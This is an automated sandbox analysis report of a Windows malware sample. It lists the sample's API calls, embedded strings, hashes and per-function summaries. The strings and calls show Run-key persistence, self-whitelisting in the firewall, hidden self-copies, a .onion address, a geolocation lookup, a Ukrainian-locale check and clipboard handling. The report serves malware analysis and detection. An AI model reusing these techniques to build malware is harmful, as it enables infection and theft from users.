DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C1A
Sleep.KERNEL32(00000BB8), ref: 009B1C25
Sleep.KERNEL32(000001F4), ref: 009B1C57
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1C67
Sleep.KERNEL32(000003E8), ref: 009B1C72
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C7D
Sleep.KERNELBASE(000001F4), ref: 009B1C9E
ExitProcess.KERNEL32 ref: 009B1CC0
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 009B205F
GetLastError.KERNEL32 ref: 009B206B
ExitProcess.KERNEL32 ref: 009B207A
PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B20BF
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B20D7
Sleep.KERNEL32(00001388), ref: 009B20E2
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B20F4
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2104
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B213B
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2146
Sleep.KERNEL32(000007D0), ref: 009B2153
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B2160
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B217F
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B2191
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B21A1
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B21AC
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B21BC
Sleep.KERNEL32(00002710), ref: 009B21C7
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B2200
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B2210
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B2220
FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 009B222F
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2252
Sleep.KERNEL32(00001F40), ref: 009B225D
DeleteFileW.KERNEL32(e5u5eue5ue5ue5ue5u), ref: 009B2268
MoveFileA.KERNEL32(3r3hr8h38h8h38f8hff,3rvr3r3bru3urbu3rbub), ref: 009B2278
Sleep.KERNEL32(000007D0), ref: 009B2283
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2293

Strings

X, xrefs: 009B2FFB
%ls\%d%d%d, xrefs: 009B363F
%ls\%ls, xrefs: 009B3662
3r3hr8h38h8h38f8hff, xrefs: 009B167B, 009B1702, 009B194B, 009B1996, 009B1BBB, 009B20EA, 009B215B, 009B2187, 009B21F6, 009B2273, 009B22B2, 009B22BF, 009B22D8, 009B237B, 009B23A4, 009B23DC, 009B2457, 009B254D, 009B25C8, 009B26B1, 009B281D, 009B2860, 009B289F, 009B28D6, 009B292C, 009B29AA, 009B2C58, 009B2CB7, 009B2CD2, 009B2E3A, 009B2FBE, 009B2FEB, 009B30DB, 009B314E, 009B31A2, 009B3209, 009B3262, 009B32A9, 009B32EB, 009B34E6
,, xrefs: 009B1695
Host Process for Windows Services, xrefs: 009B1D2B
%ls:Zone.Identifier, xrefs: 009B2752
w4yw4t4tw4twyw4y, xrefs: 009B1463, 009B154D, 009B160E, 009B17D0, 009B17F6, 009B18F5, 009B19F1, 009B1A40, 009B1A5B, 009B1A91, 009B1B50, 009B1B9C, 009B1BED, 009B1C5D, 009B2175, 009B219C, 009B2206, 009B221B, 009B230C, 009B24FB, 009B27FB, 009B2838, 009B2853, 009B287F, 009B28F0, 009B290B, 009B2A0C, 009B2A95, 009B2AF0, 009B2D9D, 009B2DA2, 009B2DEF, 009B2E22, 009B2ED2, 009B2F83, 009B2F99, 009B2FCE, 009B304C, 009B3106, 009B311C, 009B323F, 009B333C, 009B3357, 009B3398, 009B33B5, 009B33CF, 009B33E4, 009B3444, 009B345A, 009B346A, 009B34BC, 009B3525, 009B3535, 009B358A, 009B3595
f5d4s54s4sds5d5d5d, xrefs: 009B13A2, 009B140A, 009B144B, 009B15D9, 009B15F4, 009B1680, 009B17DB, 009B1920, 009B1A2A, 009B1ADE, 009B1BD5, 009B20CD, 009B20EF, 009B20FA, 009B2131, 009B2141, 009B218C, 009B21A7, 009B21B2, 009B21FB, 009B222A, 009B2248, 009B2289, 009B22C4, 009B2356, 009B2366, 009B23A9, 009B23B4, 009B23E1, 009B245C, 009B24DB, 009B25CD, 009B25ED, 009B2644, 009B265E, 009B26B6, 009B27DD, 009B280B, 009B2822, 009B282D, 009B2865, 009B288F, 009B28AA, 009B2931, 009B2994, 009B2A67, 009B2A85, 009B2BE9, 009B2BF9, 009B2CBC, 009B2CC7, 009B2CD7, 009B2D7C, 009B2D92, 009B2E0A, 009B2E3F, 009B2F69, 009B2FB1, 009B2FC3, 009B2FF0, 009B30E0, 009B30F6, 009B3153, 009B3176, 009B320E, 009B32C3, 009B32F0, 009B3326, 009B338D, 009B344F, 009B348A, 009B34CC, 009B3500
lsass.exe, xrefs: 009B278E
http://www.48838389493.jo/, xrefs: 009B1560, 009B1784, 009B18AE, 009B22EB, 009B24AF, 009B25A7, 009B2973, 009B2ACF, 009B2BB2, 009B2EE5, 009B30B8, 009B31E6
w4twywyw4yw4yw4yw4y, xrefs: 009B14F9, 009B1A56, 009B2197, 009B2216, 009B25FD, 009B2E89, 009B2EBC, 009B3352, 009B33B0, 009B33DF, 009B3530
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 009B37D5
x#, xrefs: 009B209E
e5u5eue5ue5ue5ue5u, xrefs: 009B13D6, 009B1430, 009B1479, 009B1494, 009B14D0, 009B151C, 009B15B3, 009B16C1, 009B16DC, 009B1746, 009B1761, 009B17A5, 009B17CB, 009B183E, 009B18DA, 009B193B, 009B19B0, 009B19D6, 009B1B35, 009B1B55, 009B1BA1, 009B1BF2, 009B1C62, 009B217A, 009B220B, 009B2263, 009B23EC, 009B24F6, 009B2567, 009B2800, 009B283D, 009B2884, 009B28F5, 009B2910, 009B2A9A, 009B2DDF, 009B2DF4, 009B2E4A, 009B2EA1, 009B2F4E, 009B2FD3, 009B3031, 009B3051, 009B30A0, 009B3101, 009B3224, 009B32CE, 009B33D4, 009B345F, 009B34C1, 009B359A
%s%s, xrefs: 009B3DCB
Z, xrefs: 009B2421
w4tw84thw4h8th8w4h8t, xrefs: 009B140F, 009B15DE, 009B17E0, 009B1925, 009B1AD3, 009B20D2, 009B20FF, 009B2136, 009B21B7, 009B224D, 009B228E, 009B235B, 009B236B, 009B23B9, 009B24E0, 009B24EB, 009B25F2, 009B2663, 009B2810, 009B2A8A, 009B2BDE, 009B2BEE, 009B2C29, 009B2D5E, 009B317B
lsass.exe, xrefs: 009B1CEB
2, xrefs: 009B242B
http://7fv5nq57k4qvbrpt.onion/, xrefs: 009B1D3D
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 009B3773
38fh83hf83hf83hf38h, xrefs: 009B1A68, 009B2388, 009B28B7, 009B2B06, 009B2B72, 009B3364
%ls:*:Enabled:%ls, xrefs: 009B36D0
B, xrefs: 009B3005
%s%s, xrefs: 009B3EA8
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B14E8, 009B1728, 009B1888, 009B22A1, 009B2482, 009B2585, 009B2951, 009B2AAD, 009B2B90, 009B2E78, 009B3077, 009B31C0
P, xrefs: 009B2A3B
433u3t, xrefs: 009B1CC6
6, xrefs: 009B168B
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B3711
w4tw4yw4yw4tw4t, xrefs: 009B13CB, 009B13DB, 009B1425, 009B1435, 009B147E, 009B1489, 009B1499, 009B14A4, 009B14BA, 009B14D5, 009B1511, 009B1521, 009B1537, 009B15B8, 009B15C3, 009B164B, 009B1663, 009B16C6, 009B16D1, 009B16E1, 009B16F7, 009B174B, 009B1766, 009B1771, 009B17AA, 009B17B5, 009B1843, 009B185D, 009B18CF, 009B18DF, 009B190D, 009B1930, 009B1940, 009B19B5, 009B19CB, 009B19DB, 009B1B03, 009B1B3A, 009B1B62, 009B1C0A, 009B1C15, 009B1C78, 009B20BA, 009B23F1, 009B266E, 009B2DE4, 009B2E4F, 009B2E65, 009B2EA6, 009B2F38, 009B2F53, 009B3036, 009B30A5, 009B3229, 009B32D3, 009B3477
3rvr3r3bru3urbu3rbub, xrefs: 009B170F, 009B1A1B, 009B1ACE, 009B226E, 009B2347, 009B2376, 009B2469, 009B2870, 009B289A, 009B28D1, 009B2A74, 009B2C72, 009B305E, 009B3317

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: File$Sleep$Delete$Move$Window$Internet$CloseFind$HandleOpen$ForegroundShow$CopyExistsPath$ExitProcess$CreateErrorFocusLastMutex
String ID: %ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$%s%s$,$2$38fh83hf83hf83hf38h$3r3hr8h38h8h38f8hff$3rvr3r3bru3urbu3rbub$433u3t$6$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$http://7fv5nq57k4qvbrpt.onion/$http://www.48838389493.jo/$lsass.exe$lsass.exe$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4twywyw4yw4yw4yw4y$w4yw4t4tw4twyw4y$x#
API String ID: 2034191202-2691257556
Opcode ID: 8c745cba1a9e6ae576147c9e0c078caa88ddde6de68e96dbed575ddfb7ed1af6
Instruction ID: d7ec40b7cbee1e221e1c9e7c99a80e01d2aa627218b5fed1f17ab4e65564a2a6
Opcode Fuzzy Hash: 8c745cba1a9e6ae576147c9e0c078caa88ddde6de68e96dbed575ddfb7ed1af6
Instruction Fuzzy Hash: 84237071A68714EFD720ABA4DF4ABED7774BB89B25F014288F30AA61D0C7B05980DF51

Uniqueness

Uniqueness Score: -1.00%

Function 009B0290 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 009B029E
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B02B3
InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 009B02D3
InternetReadFile.WININET(00000000,?,00000063,?), ref: 009B02F0

Part of subcall function 009B0350: strchr.MSVCRT ref: 009B035B

strcmp.MSVCRT ref: 009B031F
InternetCloseHandle.WININET(00000000), ref: 009B0333
InternetCloseHandle.WININET(00000000), ref: 009B033D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B02AE
http://api.wipmania.com/, xrefs: 009B02CA

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$http://api.wipmania.com/
API String ID: 2867819534-3587109876
Opcode ID: e17693cc28a23536fd9b0c1f759b4289f3ba70090f084100a8ceeea271279129
Instruction ID: 8ff7e72f2cdf28cae866bf1596085d598d030f1db3cde4a091404831d3c11ebd
Opcode Fuzzy Hash: e17693cc28a23536fd9b0c1f759b4289f3ba70090f084100a8ceeea271279129
Instruction Fuzzy Hash: DA216071E44308AFEB20EBF0DE4AFDD77B8AB84B15F200618B6146B1C1D6756544DF50

Uniqueness

Uniqueness Score: -1.00%

Function 009B0240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 009B024E
GetLocaleInfoA.KERNELBASE(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 009B0263
strcmp.MSVCRT ref: 009B0272

Strings

UKR, xrefs: 009B0269

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: InfoLocalememsetstrcmp
String ID: UKR
API String ID: 3255129521-64918367
Opcode ID: 280dc3e41dab86c2d922cbc3e6b3fff734c6c3d29339b7e8421956070383bbfc
Instruction ID: 1ae4a1d3394200a69906cd7b741de03c60374c62f63d7ca29c95dc624f0be78a
Opcode Fuzzy Hash: 280dc3e41dab86c2d922cbc3e6b3fff734c6c3d29339b7e8421956070383bbfc
Instruction Fuzzy Hash: 71E0D876E4430476DE00A6E09E07FDA372C5B92721F004150BB24561C2F5B0620CA7E3

Uniqueness

Uniqueness Score: -1.00%

Function 009B2D0F Relevance: 28.0, APIs: 11, Strings: 5, Instructions: 47
filesleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000001F4), ref: 009B2D30
FindWindowA.USER32(w4tw84thw4h8th8w4h8t,00000000), ref: 009B2D63
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2D81
Sleep.KERNEL32(000007D0), ref: 009B2D8C
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2D97
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4yw4t4tw4twyw4y), ref: 009B2DA7
Sleep.KERNEL32(000007D0), ref: 009B2DD9
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B2DE9
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B2DF9
Sleep.KERNEL32(00000FA0), ref: 009B2E04
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2E0F
Sleep.KERNEL32(000003E8), ref: 009B2E1C
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B2E27
Sleep.KERNEL32(00001770), ref: 009B2E32
PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B347C
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B348F
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B34C6
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B34D1
Sleep.KERNEL32(00001388), ref: 009B34DE
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B34EB
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B3505
SetForegroundWindow.USER32(?), ref: 009B3512
SetFocus.USER32(?), ref: 009B351F
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B352A
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B353A
Sleep.KERNEL32(000000C8), ref: 009B3545
CloseWindow.USER32(?), ref: 009B3552
Sleep.KERNEL32(00000FA0), ref: 009B355D
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B358F
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B359F
Sleep.KERNELBASE(000001F4), ref: 009B35C0
memset.MSVCRT ref: 009B35D4
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B35F6
rand.MSVCRT ref: 009B35FC
rand.MSVCRT ref: 009B3610
rand.MSVCRT ref: 009B3624
wsprintfW.USER32 ref: 009B364B
wsprintfW.USER32 ref: 009B366E
CreateDirectoryW.KERNELBASE(?,00000000), ref: 009B3680
Sleep.KERNELBASE(000003E8), ref: 009B3693
CopyFileW.KERNELBASE(?,?,00000000), ref: 009B36A9
Sleep.KERNELBASE(000003E8), ref: 009B36BC
wsprintfW.USER32 ref: 009B36DC
SetFileAttributesW.KERNELBASE(?,00000007), ref: 009B36EE
SetFileAttributesW.KERNELBASE(?,00000007), ref: 009B36FD
RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 009B371B
wcslen.MSVCRT ref: 009B372C
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B3852
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B387B
RegSetValueExA.ADVAPI32(?,00000000,?,00000004,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B38AD
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B38D6
RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B390B
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 009B3934
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 009B3977
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 009B3998
RegCloseKey.ADVAPI32(?,?,?,?,00000000,000F003F,?), ref: 009B39A5

Strings

w4tw84thw4h8th8w4h8t, xrefs: 009B2D5E
e5u5eue5ue5ue5ue5u, xrefs: 009B2DDF, 009B2DF4
w4tw4yw4yw4tw4t, xrefs: 009B2DE4
w4yw4t4tw4twyw4y, xrefs: 009B2D9D, 009B2DA2, 009B2DEF
f5d4s54s4sds5d5d5d, xrefs: 009B2D7C, 009B2D92, 009B2E0A

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: File$Sleep$Delete$Move$OpenWindow$Valuerandwsprintf$AttributesCloseCreateFind$CopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
String ID: e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4yw4t4tw4twyw4y
API String ID: 1434077179-1752865879
Opcode ID: 2fe90c659aea2248d0cde16d05a7eeafbe2f415483edf0c02526eef8a5cbdfe2
Instruction ID: 83e851d1f76a5fd4ea0daab5acb50d582cbcc42edd4f1f313bfe23fde630de04
Opcode Fuzzy Hash: 2fe90c659aea2248d0cde16d05a7eeafbe2f415483edf0c02526eef8a5cbdfe2
Instruction Fuzzy Hash: 91113770A68254DFD7109B94DE0EBEC76B0BF81729F0186C9E24AA5190C7B04AC4EF52

Uniqueness

Uniqueness Score: -1.00%

Function 009B0080 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 009B008E
memset.MSVCRT ref: 009B009E
CreateProcessW.KERNELBASE(00000000,009B0771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009B00D7
Sleep.KERNELBASE(000003E8), ref: 009B00E7
Sleep.KERNEL32(000003E8), ref: 009B00F6
ShellExecuteW.SHELL32(00000000,open,009B0771,00000000,00000000,00000000), ref: 009B010D
Sleep.KERNEL32(000003E8), ref: 009B0127

Strings

D, xrefs: 009B00A6
, xrefs: 009B011C
open, xrefs: 009B0106

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Sleep$memset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 4117032385-2182757814
Opcode ID: 92ce93860df5dbb8864e8ac07c4c151763c5cf58edea198edbe387002a975c52
Instruction ID: 4f4963b9ac649fa18a17c3daa8f574171c0ab6b19de2a95d7edd2df558e178aa
Opcode Fuzzy Hash: 92ce93860df5dbb8864e8ac07c4c151763c5cf58edea198edbe387002a975c52
Instruction Fuzzy Hash: FE114271A98308BBEB10DF94DE46FDE7778AB55B10F100215F7096F1C0DAB19A00DB55

Uniqueness

Uniqueness Score: -1.00%

Function 009B427A Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 009B42A7
__p__fmode.MSVCRT ref: 009B42BC
__p__commode.MSVCRT ref: 009B42CA
__setusermatherr.MSVCRT ref: 009B42F6
_initterm.MSVCRT ref: 009B430C
__getmainargs.MSVCRT ref: 009B432F
_initterm.MSVCRT ref: 009B433F
GetStartupInfoA.KERNEL32(?), ref: 009B437E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 009B43A2
exit.MSVCRT ref: 009B43B2
_XcptFilter.MSVCRT ref: 009B43C4

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 843b44e65c6122d7db047517038e588c2a58250530f44c22099b0df88b2cf863
Instruction ID: fe202910d3200a30643a50dafb81488d234e9ce1a8926ec05256ef417e1fc338
Opcode Fuzzy Hash: 843b44e65c6122d7db047517038e588c2a58250530f44c22099b0df88b2cf863
Instruction Fuzzy Hash: 0E418171818348AFDB24AFA8DF49BE97BF8FB49734F24021AF551972A2D7744841EB10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009B0B30 Relevance: 72.0, APIs: 31, Strings: 10, Instructions: 291
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 009B0B6F
wsprintfW.USER32 ref: 009B0B8F
wsprintfW.USER32 ref: 009B0BAF
wsprintfW.USER32 ref: 009B0BCF
wsprintfW.USER32 ref: 009B0BE8
PathFileExistsW.SHLWAPI(?), ref: 009B0BF8
SetFileAttributesW.KERNEL32(?,00000080), ref: 009B0C31
DeleteFileW.KERNEL32(?), ref: 009B0C3E
PathFileExistsW.SHLWAPI(?), ref: 009B0C4B
PathFileExistsW.SHLWAPI(?), ref: 009B0C5C
CreateDirectoryW.KERNEL32(?,00000000), ref: 009B0C6F
SetFileAttributesW.KERNEL32(?,00000007), ref: 009B0C82
PathFileExistsW.SHLWAPI(?), ref: 009B0C8F
CopyFileW.KERNEL32(009BA128,?,00000000), ref: 009B0CA7
SetFileAttributesW.KERNEL32(?,00000001), ref: 009B0CB6
PathFileExistsW.SHLWAPI(?), ref: 009B0CC3

Strings

%s\%s, xrefs: 009B0F43
%s\%s, xrefs: 009B0ED0
%s\%s\DriveMgr.exe, xrefs: 009B0B83
%s\*, xrefs: 009B0BDC
%s\%s, xrefs: 009B0BC3
%s\%s, xrefs: 009B0BA3
shell32.dll, xrefs: 009B0CF6
shell32.dll, xrefs: 009B0CD7
%s.lnk, xrefs: 009B0B63
%s\%s\%s, xrefs: 009B0F6A

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: File$ExistsPathwsprintf$Attributes$CopyCreateDeleteDirectory
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$shell32.dll$shell32.dll
API String ID: 3616058356-572023173
Opcode ID: 2f99b9f7caeccdecf41f96f942689b3e4ce3ceccc4b6f641ccaf7404d7d5ac67
Instruction ID: 0dd74467e64bfca42182fbb3f7970168924f9dc67dd842b661bbce97a6f266d6
Opcode Fuzzy Hash: 2f99b9f7caeccdecf41f96f942689b3e4ce3ceccc4b6f641ccaf7404d7d5ac67
Instruction Fuzzy Hash: 7DC182B19183189BCB24DFA4DE44FEAB7B8BF84324F4046D8F109A6191D770DA94DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009AF660 Relevance: 39.0, APIs: 12, Strings: 10, Instructions: 477clipboardstringmemoryCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 009AF671
isalpha.MSVCRT ref: 009AF94C
isdigit.MSVCRT ref: 009AF962
strlen.MSVCRT ref: 009AFC14
GlobalAlloc.KERNEL32(00002002,?), ref: 009AFC2B
GlobalLock.KERNEL32(?), ref: 009AFC38
memcpy.MSVCRT ref: 009AFC50
GlobalUnlock.KERNEL32(?), ref: 009AFC5C
